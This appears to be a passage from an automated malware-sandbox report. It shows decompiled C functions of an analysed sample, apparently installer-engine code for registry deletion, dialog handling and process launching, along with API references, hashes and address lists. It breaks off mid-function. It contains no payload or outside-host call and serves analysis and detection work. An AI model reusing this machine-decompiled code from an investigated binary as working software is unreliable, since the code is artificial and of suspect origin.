                                                                                        • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                        • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                        • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 73761837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 97%
                                                                                        			E73761837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7376405c = _a8;
				_t77 = 0;
				 *0x73764060 = _a16;
				_v12 = 0;
				_v8 = E7376123B();
				_t90 = E737612FE(_t42);
				_t87 = _t85;
				_t81 = E7376123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7376123B();
					_t77 = E737612FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73761429(_t85, _t90, _t87,  &_v52);
								E73761266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73762EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73762F10(_t59, _t83, _t85);
						} else {
							_t48 = E73762F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73762D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73762E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73762D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                        0x73761837
                                                                                        0x73761841
                                                                                        0x7376184a
                                                                                        0x7376184d
                                                                                        0x73761852
                                                                                        0x7376185b
                                                                                        0x73761864
                                                                                        0x73761866
                                                                                        0x7376186d
                                                                                        0x7376186f
                                                                                        0x73761872
                                                                                        0x73761876
                                                                                        0x73761882
                                                                                        0x7376188b
                                                                                        0x73761890
                                                                                        0x73761893
                                                                                        0x73761899
                                                                                        0x73761899
                                                                                        0x7376189c
                                                                                        0x7376189f
                                                                                        0x737618a2
                                                                                        0x73761968
                                                                                        0x73761968
                                                                                        0x7376196b
                                                                                        0x737619e5
                                                                                        0x737619e9
                                                                                        0x737619f8
                                                                                        0x737619fb
                                                                                        0x73761a03
                                                                                        0x73761a03
                                                                                        0x73761a03
                                                                                        0x73761a05
                                                                                        0x73761a05
                                                                                        0x73761a06
                                                                                        0x73761a06
                                                                                        0x73761a08
                                                                                        0x73761a0a
                                                                                        0x73761a10
                                                                                        0x73761a19
                                                                                        0x73761a2a
                                                                                        0x73761a35
                                                                                        0x73761a35
                                                                                        0x737619fd
                                                                                        0x737619e0
                                                                                        0x737619e0
                                                                                        0x737619e2
                                                                                        0x737619e2
                                                                                        0x00000000
                                                                                        0x737619e2
                                                                                        0x737619ff
                                                                                        0x73761a01
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761a01
                                                                                        0x737619ed
                                                                                        0x737619f1
                                                                                        0x00000000
                                                                                        0x737619f1
                                                                                        0x7376196d
                                                                                        0x7376196d
                                                                                        0x7376196e
                                                                                        0x737619d7
                                                                                        0x737619d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737619db
                                                                                        0x737619de
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737619de
                                                                                        0x73761970
                                                                                        0x73761970
                                                                                        0x73761971
                                                                                        0x737619aa
                                                                                        0x737619ae
                                                                                        0x737619ca
                                                                                        0x737619cd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737619cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737619d1
                                                                                        0x737619d3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737619d5
                                                                                        0x737619b0
                                                                                        0x737619b4
                                                                                        0x737619b6
                                                                                        0x737619b8
                                                                                        0x737619ba
                                                                                        0x737619c3
                                                                                        0x737619bc
                                                                                        0x737619bc
                                                                                        0x737619bc
                                                                                        0x00000000
                                                                                        0x737619ba
                                                                                        0x73761973
                                                                                        0x73761973
                                                                                        0x73761976
                                                                                        0x737619a3
                                                                                        0x737619a5
                                                                                        0x00000000
                                                                                        0x737619a5
                                                                                        0x73761978
                                                                                        0x73761978
                                                                                        0x7376197b
                                                                                        0x7376198b
                                                                                        0x7376198f
                                                                                        0x7376199c
                                                                                        0x7376199e
                                                                                        0x00000000
                                                                                        0x7376199e
                                                                                        0x73761991
                                                                                        0x73761993
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761995
                                                                                        0x73761998
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376199a
                                                                                        0x7376197e
                                                                                        0x7376197f
                                                                                        0x73761985
                                                                                        0x73761987
                                                                                        0x73761987
                                                                                        0x00000000
                                                                                        0x7376197f
                                                                                        0x737618a8
                                                                                        0x73761920
                                                                                        0x73761922
                                                                                        0x73761925
                                                                                        0x73761943
                                                                                        0x73761946
                                                                                        0x7376194c
                                                                                        0x73761951
                                                                                        0x73761927
                                                                                        0x73761927
                                                                                        0x7376192b
                                                                                        0x7376192f
                                                                                        0x73761931
                                                                                        0x73761931
                                                                                        0x73761954
                                                                                        0x73761957
                                                                                        0x00000000
                                                                                        0x7376195d
                                                                                        0x7376195d
                                                                                        0x73761960
                                                                                        0x00000000
                                                                                        0x73761960
                                                                                        0x73761957
                                                                                        0x737618aa
                                                                                        0x737618ad
                                                                                        0x73761911
                                                                                        0x73761913
                                                                                        0x73761915
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376191b
                                                                                        0x737618af
                                                                                        0x737618b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737618b4
                                                                                        0x737618b5
                                                                                        0x737618eb
                                                                                        0x737618ef
                                                                                        0x73761907
                                                                                        0x73761909
                                                                                        0x00000000
                                                                                        0x73761909
                                                                                        0x737618f1
                                                                                        0x737618f3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737618f9
                                                                                        0x737618fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761902
                                                                                        0x737618b7
                                                                                        0x737618ba
                                                                                        0x737618e1
                                                                                        0x00000000
                                                                                        0x737618bc
                                                                                        0x737618bc
                                                                                        0x737618bd
                                                                                        0x737618d1
                                                                                        0x737618d3
                                                                                        0x737618bf
                                                                                        0x737618c1
                                                                                        0x737618c7
                                                                                        0x737618c9
                                                                                        0x737618c9
                                                                                        0x737618c1
                                                                                        0x00000000
                                                                                        0x737618bd

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 2979337801-0
                                                                                        • Opcode ID: 1d4f2bbbbd94277087fc08c8140e5333c8e573a356b85c3cd08004a885a13f2a
                                                                                        • Instruction ID: 421fec95cb0c14df9a19239098bfaa16b49095bc07ebc697a4b3bfefdda13156
                                                                                        • Opcode Fuzzy Hash: 1d4f2bbbbd94277087fc08c8140e5333c8e573a356b85c3cd08004a885a13f2a
                                                                                        • Instruction Fuzzy Hash: 6F510632D042D9EFEB02CFB4C9BC7ADBBBAAF4425AF18405ADC07E3194C63559419751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                        0x00402a57
                                                                                        0x00402a5f
                                                                                        0x00402a87
                                                                                        0x00402a71
                                                                                        0x00402ac1
                                                                                        0x00402ac7
                                                                                        0x00000000
                                                                                        0x00402ac9
                                                                                        0x00402a85
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402a85
                                                                                        0x00402a9c
                                                                                        0x00402aa4
                                                                                        0x00402aab
                                                                                        0x00402ad7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402adf
                                                                                        0x00402ae7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402ae7
                                                                                        0x00000000
                                                                                        0x00402aba
                                                                                        0x00402ace

                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                        • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                        • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                        • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                        0x00401ccb
                                                                                        0x00401cd2
                                                                                        0x00401d01
                                                                                        0x00401d09
                                                                                        0x00401d10
                                                                                        0x00401d10
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 00401CC5
                                                                                        • GetClientRect.USER32 ref: 00401CD2
                                                                                        • LoadImageA.USER32 ref: 00401CF3
                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                        • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                        • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                        • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 51%
                                                                                        			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                        0x004046f9
                                                                                        0x004046fd
                                                                                        0x00404705
                                                                                        0x00404708
                                                                                        0x00404709
                                                                                        0x0040470b
                                                                                        0x0040470d
                                                                                        0x00404710
                                                                                        0x00404710
                                                                                        0x00404717
                                                                                        0x0040471d
                                                                                        0x0040471d
                                                                                        0x00404724
                                                                                        0x0040472f
                                                                                        0x00404730
                                                                                        0x00404733
                                                                                        0x00404733
                                                                                        0x00404740
                                                                                        0x0040474b
                                                                                        0x0040474e
                                                                                        0x00404760
                                                                                        0x00404767
                                                                                        0x00404768
                                                                                        0x00404777
                                                                                        0x00404787
                                                                                        0x004047a3

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                        • wsprintfA.USER32 ref: 00404787
                                                                                        • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s
                                                                                        • API String ID: 3540041739-3551169577
                                                                                        • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                        • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                        • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                        • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 51%
                                                                                        			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                        0x00401bb6
                                                                                        0x00401bc2
                                                                                        0x00401bc5
                                                                                        0x00401bce
                                                                                        0x00401bce
                                                                                        0x00401bd1
                                                                                        0x00401bd5
                                                                                        0x00401bde
                                                                                        0x00401bde
                                                                                        0x00401be1
                                                                                        0x00401be5
                                                                                        0x00401be7
                                                                                        0x00401c34
                                                                                        0x00401c36
                                                                                        0x00401c3f
                                                                                        0x00401c47
                                                                                        0x00401c4a
                                                                                        0x00401c4a
                                                                                        0x00401c53
                                                                                        0x00000000
                                                                                        0x00401be9
                                                                                        0x00401bf0
                                                                                        0x00401bf2
                                                                                        0x00401bfa
                                                                                        0x00401bfd
                                                                                        0x00401c25
                                                                                        0x00401c59
                                                                                        0x00401c59
                                                                                        0x00401bff
                                                                                        0x00401c0d
                                                                                        0x00401c15
                                                                                        0x00401c18
                                                                                        0x00401c18
                                                                                        0x00401bfd
                                                                                        0x00401c5c
                                                                                        0x00401c5f
                                                                                        0x00401c65
                                                                                        0x00402833
                                                                                        0x00402833
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                        • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                        • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                        • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                        0x004053cf
                                                                                        0x004053eb
                                                                                        0x004053f3
                                                                                        0x004053f8
                                                                                        0x00000000
                                                                                        0x004053fe
                                                                                        0x00405402

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                        • Error launching installer, xrefs: 004053D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                        • API String ID: 3712363035-2984075973
                                                                                        • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                        • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                        • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                        • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405659(CHAR* _a4) {
